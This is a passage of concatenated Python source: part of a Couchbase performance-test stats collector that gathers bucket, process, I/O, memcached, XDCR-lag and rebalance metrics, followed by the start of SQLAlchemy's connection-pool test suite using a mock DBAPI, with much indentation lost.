status, db_size = rest.get_database_disk_size(self.bucket)
if status:
self._task["bucket_size"].append(db_size)
except IndexError, e:
retries += 1
log.error("unable to get bucket size {0}: {1}"
.format(self.bucket, e))
log.warning("retries: {0} of {1}".format(retries, RETRIES))
if retries == RETRIES:
try:
node = nodes_iterator.next()
rest = RestConnection(node)
retries = 0
except StopIteration:
log.error("no nodes available: stop collecting bucket_size")
return
log.info("finished bucket size stats")
def get_data_file_size(self, nodes, interval, bucket):
shells = []
for node in nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception as error:
log.error(error)
paths = []
if shells[0].is_couchbase_installed():
bucket_path = self.data_path + '/{0}'.format(bucket)
paths.append(bucket_path)
view_path = bucket_path + '/set_view_{0}_design'.format(bucket)
paths.append(view_path)
else:
paths.append(self.data_path + '/{0}-data'.format(bucket))
d = {"snapshots": []}
start_time = str(self._task["time"])
while not self._aborted():
time.sleep(interval)
current_time = time.time()
i = 0
for shell in shells:
node = nodes[i]
unique_id = node.ip + '-' + start_time
value = {}
for path in paths:
size = shell.get_data_file_size(path)
value["file"] = path.split('/')[-1]
value["size"] = size
value["unique_id"] = unique_id
value["time"] = current_time
value["ip"] = node.ip
d["snapshots"].append(value.copy())
i += 1
self._task["data_size_stats"] = d["snapshots"]
log.info("finished data_size_stats")
#ops stats
#{'tot-sets': 899999, 'tot-gets': 1, 'tot-items': 899999, 'tot-creates': 899999}
def ops_stats(self, ops_stat):
ops_stat["time"] = time.time()
self._task["ops-temp"].append(ops_stat)
if len(self._task["ops-temp"]) >= 500 * (1 + self.active_mergers):
# Prevent concurrent merge
while self.active_mergers:
time.sleep(0.1)
# Semaphore: +1 active
self.active_mergers += 1
# Merge
merged = self._merge()
self._task["ops"].append(merged)
self._task["ops-temp"] = self._task["ops-temp"][500:]
# Semaphore: -1 active
self.active_mergers -= 1
#if self._task["ops"] has more than 1000 elements try to aggregate them ?
def latency_stats(self, latency_cmd, latency_stat, cur_time=0):
if self._task["latency"].get(latency_cmd) is None:
self._task["latency"][latency_cmd] = []
temp_latency_stat = latency_stat.copy()
if not cur_time:
cur_time = time.time()
temp_latency_stat['time'] = int(cur_time)
temp_latency_stat['delta'] = cur_time - self._task['time']
self._task["latency"][latency_cmd].append(temp_latency_stat)
def _merge(self):
first = self._task["ops-temp"][0]
merged = {"startTime": first["start-time"]}
totalgets = 0
totalsets = 0
totalqueries = 0
delta = 0
for i in range(499):
current = self._task["ops-temp"][i]
next = self._task["ops-temp"][i + 1]
totalgets += current["tot-gets"]
totalsets += current["tot-sets"]
totalqueries += current["tot-queries"]
delta += (next["start-time"] - current["start-time"])
merged["endTime"] = merged["startTime"] + delta
merged["totalSets"] = totalsets
merged["totalGets"] = totalgets
merged["totalQueries"] = totalqueries
qps = totalqueries / float(delta)
merged["queriesPerSec"] = qps
return merged
def total_stats(self, ops_stat):
ops_stat["time"] = time.time()
self._task["totalops"].append(ops_stat)
def build_stats(self, nodes):
json_response = StatUtil.build_info(nodes[0])
self._task["buildstats"] = json_response
def machine_stats(self, nodes):
machine_stats = StatUtil.machine_info(nodes[0])
self._task["machinestats"] = machine_stats
def reb_stats(self, start, dur):
log.info("recording reb start = {0}, reb duration = {1}".format(start, dur))
self._reb_stats["reb_start"] = start
self._reb_stats["reb_dur"] = dur
def _extract_proc_info(self, shell, pid):
output, error = shell.execute_command("cat /proc/{0}/stat".format(pid))
fields = (
'pid', 'comm', 'state', 'ppid', 'pgrp', 'session', 'tty_nr',
'tpgid', 'flags', 'minflt', 'cminflt', 'majflt', 'cmajflt',
            'utime', 'stime', 'cutime', 'cstime', 'priority', 'nice',
'num_threads', 'itrealvalue', 'starttime', 'vsize', 'rss',
'rsslim', 'startcode', 'endcode', 'startstack', 'kstkesp',
            'kstkeip', 'signal', 'blocked', 'sigignore', 'sigcatch', 'wchan',
'nswap', 'cnswap', 'exit_signal', 'processor', 'rt_priority',
'policy', 'delayacct_blkio_ticks', 'guest_time', 'cguest_time')
return {} if error else dict(zip(fields, output[0].split(' ')))
def _extract_io_info(self, shell):
"""
Extract info from iostat
Output:
[kB_read, kB_wrtn, %util, %iowait, %idle]
Rough Benchmarks:
My local box (WIFI LAN - VM), took ~1.2 sec for this routine
"""
CMD = "iostat -dk | grep 'sd. ' | " \
"awk '{read+=$5; write+=$6} END { print read, write }'"
out, err = shell.execute_command(CMD)
results = out[0]
CMD = "iostat -dkx | grep 'sd. ' | "\
"awk '{util+=$12} END { print util/NR }'"
out, err = shell.execute_command(CMD)
results = "%s %s" % (results, out[0])
CMD = "iostat 1 2 -c | awk 'NR == 7 { print $4, $6 }'"
out, err = shell.execute_command(CMD)
results = "%s %s" % (results, out[0])
return results.split(' ')
def system_stats(self, pnames, interval=10):
shells = []
for node in self.nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception, error:
log.error(error)
d = {"snapshots": []}
# "pname":"x","pid":"y","snapshots":[{"time":time,"value":value}]
start_time = str(self._task["time"])
while not self._aborted():
time.sleep(interval)
current_time = time.time()
i = 0
for shell in shells:
node = self.nodes[i]
unique_id = node.ip + '-' + start_time
for pname in pnames:
obj = RemoteMachineHelper(shell).is_process_running(pname)
if obj and obj.pid:
value = self._extract_proc_info(shell, obj.pid)
value["name"] = pname
value["id"] = obj.pid
value["unique_id"] = unique_id
value["time"] = current_time
value["ip"] = node.ip
d["snapshots"].append(value)
i += 1
self._task["systemstats"] = d["snapshots"]
log.info("finished system_stats")
def iostats(self, interval=10):
shells = []
for node in self.nodes:
try:
shells.append(RemoteMachineShellConnection(node))
except Exception, error:
log.error(error)
self._task["iostats"] = []
log.info("started capturing io stats")
while not self._aborted():
time.sleep(interval)
log.info("collecting io stats")
for shell in shells:
try:
kB_read, kB_wrtn, util, iowait, idle = \
self._extract_io_info(shell)
except (ValueError, TypeError, IndexError):
continue
if kB_read and kB_wrtn:
self._task["iostats"].append({"time": time.time(),
"ip": shell.ip,
"read": kB_read,
"write": kB_wrtn,
"util": util,
"iowait": iowait,
"idle": idle})
log.info("finished capturing io stats")
def capture_mb_snapshot(self, node):
"""Capture membase stats snapshot manually"""
log.info("capturing memcache stats snapshot for {0}".format(node.ip))
stats = {}
try:
bucket = RestConnection(node).get_buckets()[0].name
mc = MemcachedClientHelper.direct_client(node, bucket)
stats = mc.stats()
stats.update(mc.stats("warmup"))
except Exception, e:
log.error(e)
return False
finally:
stats["time"] = time.time()
stats["ip"] = node.ip
self._mb_stats["snapshots"].append(stats)
print stats
log.info("memcache stats snapshot captured")
return True
def membase_stats(self, interval=60):
mcs = []
for node in self.nodes:
try:
bucket = RestConnection(node).get_buckets()[0].name
mc = MemcachedClientHelper.direct_client(node, bucket)
mcs.append(mc)
except Exception, error:
log.error(error)
self._task["membasestats"] = []
self._task["timings"] = []
self._task["dispatcher"] = []
data = dict()
for mc in mcs:
data[mc.host] = {"snapshots": [], "timings": [], "dispatcher": []}
while not self._aborted():
time.sleep(interval)
log.info("collecting membase stats")
for mc in mcs:
                for retry in xrange(RETRIES):
                    try:
                        stats = mc.stats()
                    except Exception as e:
                        log.warn("{0}, retries = {1}".format(str(e), retry))
time.sleep(2)
mc.reconnect()
else:
break
else:
stats = {}
data[mc.host]["snapshots"].append(stats)
for arg in ("timings", "dispatcher"):
try:
stats = mc.stats(arg)
data[mc.host][arg].append(stats)
except EOFError, e:
log.error("unable to get {0} stats {1}: {2}"
.format(arg, mc.host, e))
for host in (mc.host for mc in mcs):
unique_id = host + '-' + str(self._task["time"])
current_time = time.time()
if self._mb_stats["snapshots"]: # use manually captured stats
self._task["membasestats"] = self._mb_stats["snapshots"]
else: # use periodically captured stats
for snapshot in data[host]["snapshots"]:
snapshot["unique_id"] = unique_id
snapshot["time"] = current_time
snapshot["ip"] = host
self._task["membasestats"].append(snapshot)
for timing in data[host]["timings"]:
timing["unique_id"] = unique_id
timing["time"] = current_time
timing["ip"] = host
self._task["timings"].append(timing)
for dispatcher in data[host]["dispatcher"]:
dispatcher["unique_id"] = unique_id
dispatcher["time"] = current_time
dispatcher["ip"] = host
self._task["dispatcher"].append(dispatcher)
if data[host]["timings"]:
log.info("dumping disk timing stats: {0}".format(host))
                latest_timings = data[host]["timings"][-1]
                for key, value in sorted(latest_timings.iteritems()):
if key.startswith("disk"):
print "{0:50s}: {1}".format(key, value)
log.info("finished membase_stats")
def ns_server_stats(self, interval=60):
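        # Poll bucket stats and system stats over the REST API every `interval`
        # seconds. When polling has failed more than RETRIES times, the
        # collector moves on to the next node; when no nodes remain it stops.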
self._task["ns_server_stats"] = []
self._task["ns_server_stats_system"] = []
nodes_iterator = (node for node in self.nodes)
node = nodes_iterator.next()
retries = 0
not_null = lambda v: v if v is not None else 0
rest = RestConnection(node)
while not self._aborted():
time.sleep(interval)
log.info("collecting ns_server_stats")
try:
# Bucket stats
ns_server_stats = rest.fetch_bucket_stats(bucket=self.bucket)
for key, value in ns_server_stats["op"]["samples"].iteritems():
ns_server_stats["op"]["samples"][key] = not_null(value)
self._task["ns_server_stats"].append(ns_server_stats)
# System stats
ns_server_stats_system = rest.fetch_system_stats()
self._task["ns_server_stats_system"].append(ns_server_stats_system)
except ServerUnavailableException, e:
log.error(e)
except (ValueError, TypeError), e:
log.error("unable to parse json object {0}: {1}".format(node, e))
else:
continue
retries += 1
if retries <= RETRIES:
log.warning("retries: {0} of {1}".format(retries, RETRIES))
else:
try:
node = nodes_iterator.next()
rest = RestConnection(node)
retries = 0
except StopIteration:
log.error("no nodes available: stop collecting ns_server_stats")
return
log.info("finished ns_server_stats")
def indexing_time_stats(self, ddoc, interval=60):
"""Collect view indexing stats"""
self._task['view_info'] = list()
rests = [RestConnection(node) for node in self.nodes]
while not self._aborted():
time.sleep(interval)
log.info("collecting view indexing stats")
for rest in rests:
try:
data = rest.set_view_info(self.bucket, ddoc)
except (SetViewInfoNotFound, ServerUnavailableException), error:
log.error(error)
continue
try:
update_history = data[1]['stats']['update_history']
indexing_time = \
[event['indexing_time'] for event in update_history]
avg_time = sum(indexing_time) / len(indexing_time)
except (IndexError, KeyError, ValueError):
avg_time = 0
finally:
self._task['view_info'].append({'node': rest.ip,
'indexing_time': avg_time,
'timestamp': time.time()})
log.info("finished collecting view indexing stats")
def indexing_throughput_stats(self, interval=15):
self._task['indexer_info'] = list()
indexers = defaultdict(dict)
rests = [RestConnection(node) for node in self.nodes]
while not self._aborted():
time.sleep(interval) # 15 seconds by default
# Grab indexer tasks from all nodes
tasks = list()
for rest in rests:
try:
active_tasks = rest.active_tasks()
except ServerUnavailableException, error:
log.error(error)
continue
indexer_tasks = filter(lambda t: t['type'] == 'indexer',
active_tasks)
tasks.extend(indexer_tasks)
# Calculate throughput for every unique PID
thr = 0
for task in tasks:
uiid = task['pid'] + str(task['started_on'])
changes_delta = \
task['changes_done'] - indexers[uiid].get('changes_done', 0)
time_delta = \
task['updated_on'] - indexers[uiid].get('updated_on',
task['started_on'])
if time_delta:
thr += changes_delta / time_delta
indexers[uiid]['changes_done'] = task['changes_done']
indexers[uiid]['updated_on'] = task['updated_on']
# Average throughput
self._task['indexer_info'].append({
'indexing_throughput': thr,
'timestamp': time.time()
})
def _get_xdcr_latency(self, src_client, dst_client, multi=False):
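        # Measure XDCR replication lag: write tracking key(s) to the source
        # cluster, then poll the destination cluster until the data shows up
        # there. In single-key mode the write is also tracked via observe() so
        # persistence time can be reported separately. Times are in milliseconds.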
PREFIX = "xdcr_track_"
kvs = dict((PREFIX + hex(), hex()) for _ in xrange(10))
key = PREFIX + hex()
persisted = False
t0 = t1 = time.time()
if multi:
src_client.setMulti(0, 0, kvs)
while True:
try:
dst_client.getMulti(kvs.keys(), timeout_sec=120,
parallel=False)
break
except ValueError:
time.sleep(0.05)
else:
src_client.set(key, 0, 0, key)
while not persisted:
_, _, _, persisted, _ = src_client.observe(key)
t1 = time.time()
while time.time() - t1 < 300: # 5 minutes timeout
try:
dst_client.get(key)
break
except:
time.sleep(0.05)
total_time = (time.time() - t0) * 1000
persist_time = (t1 - t0) * 1000
if multi:
return {"multi_100_xdcr_lag": total_time}
else:
return {
"xdcr_lag": total_time,
"xdcr_persist_time": persist_time,
"xdcr_diff": total_time - persist_time,
"timestamp": time.time()
}
def xdcr_lag_stats(self, interval=5):
master = self.clusters[0][0]
slave = self.clusters[1][0]
src_client = VBucketAwareMemcached(RestConnection(master), self.bucket)
dst_client = VBucketAwareMemcached(RestConnection(slave), self.bucket)
log.info("started xdcr lag measurements")
self._task["xdcr_lag"] = list()
while not self._aborted():
single_stats = self._get_xdcr_latency(src_client, dst_client)
multi_stats = self._get_xdcr_latency(src_client, dst_client, True)
multi_stats.update(single_stats)
self._task['xdcr_lag'].append(multi_stats)
time.sleep(interval)
filename = time.strftime("%Y%m%d_%H%M%S_xdcr_lag.json",
time.localtime())
with open(filename, "w") as fh:
fh.write(json.dumps(self._task['xdcr_lag'],
indent=4, sort_keys=True))
log.info("finished xdcr lag measurements")
def rebalance_progress(self, interval=15):
self._task["rebalance_progress"] = list()
nodes = cycle(self.nodes)
rest = RestConnection(nodes.next())
while not self._aborted():
try:
tasks = rest.ns_server_tasks()
except ServerUnavailableException, error:
log.error(error)
rest = RestConnection(nodes.next())
continue
for task in tasks:
if task["type"] == "rebalance":
self._task["rebalance_progress"].append({
"rebalance_progress": task.get("progress", 0),
"timestamp": time.time()
})
break
time.sleep(interval)
log.info("finished active_tasks measurements")
def _aborted(self):
return self._task["state"] == "stopped"
def start_atop(self):
"""Start atop collector"""
for node in self.nodes:
try:
shell = RemoteMachineShellConnection(node)
except SystemExit:
log.error("can't establish SSH session with {0}".format(node.ip))
else:
cmd = "killall atop; rm -fr /tmp/*.atop;" + \
"atop -w /tmp/{0}.atop -a 15".format(node.ip) + \
" > /dev/null 2> /dev.null < /dev/null &"
shell.execute_command(cmd)
def stop_atop(self):
"""Stop atop collector"""
for node in self.nodes:
try:
shell = RemoteMachineShellConnection(node)
except SystemExit:
log.error("can't establish SSH session with {0}".format(node.ip))
else:
shell.execute_command("killall atop")
class CallbackStatsCollector(StatsCollector):
"""Invokes optional callback when registered levels have been reached
during stats sample()'ing."""
def __init__(self, verbosity):
# Tuples of level_name, level, callback.
self.level_callbacks = []
super(CallbackStatsCollector, self).__init__(verbosity)
def sample(self, cur):
for level_name, level, callback in self.level_callbacks:
if level < cur.get(level_name, -1):
callback(cur)
return super(CallbackStatsCollector, self).sample(cur)
class StatUtil(object):
@staticmethod
def build_info(node):
rest = RestConnection(node)
api = rest.baseUrl + 'nodes/self'
status, content, header = rest._http_request(api)
json_parsed = json.loads(content)
return json_parsed
@staticmethod
def machine_info(node):
shell = RemoteMachineShellConnection(node)
info = shell.extract_remote_info()
return {"type": info.type, "distribution": info.distribution_type,
"version": info.distribution_version, "ram": info.ram,
"cpu": info.cpu, "disk": info.disk, "hostname": info.hostname}
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.pool.impl import _AsyncConnDialect
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_not_none
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
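# The tests below drive MockDBAPI roughly like this: db.shutdown(True) makes
# every subsequent connect() raise, db.shutdown(False) restores normal
# connections, so pool reconnect paths can be exercised without a real database.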
class PoolTestBase(fixtures.TestBase):
def setup_test(self):
pool.clear_managers()
self._teardown_conns = []
def teardown_test(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_test_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
_is_asyncio = kw.pop("_is_asyncio", False)
p = pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw)
if _is_asyncio:
p._is_asyncio = True
p._dialect = _AsyncConnDialect()
return dbapi, p
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
is_async = False
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "CL", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self, _is_asyncio=False):
p = self._queuepool_fixture(_is_asyncio=_is_asyncio)
canary = []
@event.listens_for(p, "checkin")
def checkin(*arg, **kw):
canary.append("checkin")
@event.listens_for(p, "close_detached")
def close_detached(*arg, **kw):
canary.append("close_detached")
@event.listens_for(p, "detach")
def detach(*arg, **kw):
canary.append("detach")
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.combinations((True, testing.requires.python3), (False,))
def test_checkin_event_gc(self, detach_gced):
p, canary = self._checkin_event_fixture(_is_asyncio=detach_gced)
c1 = p.connect()
dbapi_connection = weakref.ref(c1.connection)
eq_(canary, [])
del c1
lazy_gc()
if detach_gced:
# "close_detached" is not called because for asyncio the
# connection is just lost.
eq_(canary, ["detach"])
else:
eq_(canary, ["checkin"])
gc_collect()
if detach_gced:
is_none(dbapi_connection())
else:
is_not_none(dbapi_connection())
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
